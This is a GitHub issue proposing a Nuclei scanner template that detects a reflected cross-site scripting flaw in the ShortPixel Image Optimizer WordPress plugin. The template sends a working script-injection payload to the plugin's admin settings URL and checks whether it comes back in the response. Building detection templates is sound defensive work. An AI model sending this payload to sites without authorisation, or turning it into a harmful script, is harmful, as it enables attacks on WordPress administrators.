### ISSUE TITLE
ShortPixel Image Optimizer < 4.22.10 - Reflected Cross-Site Scripting

### ISSUE THREAD

**Issue by akincibor** [projectdiscovery/nuclei-templates#4697]
```yaml
id: shortpixel-image-optimizer-xss

info:
  name: ShortPixel Image Optimizer < 4.22.10 - Reflected Cross-Site Scripting
  author: Akincibor
  severity: medium
  description: The plugin does not escape a generated URLs before outputting them back in an attribute, leading to Reflected Cross-Site Scripting.
  reference:
    - https://wpscan.com/vulnerability/8a0ddd14-7260-4fb6-bb87-2916aa41ff01
  tags: wp-plugin,xss,wp,wordpress

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/options-general.php?page=wp-shortpixel-settings&"><script>alert(document.domain)</script>'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
```
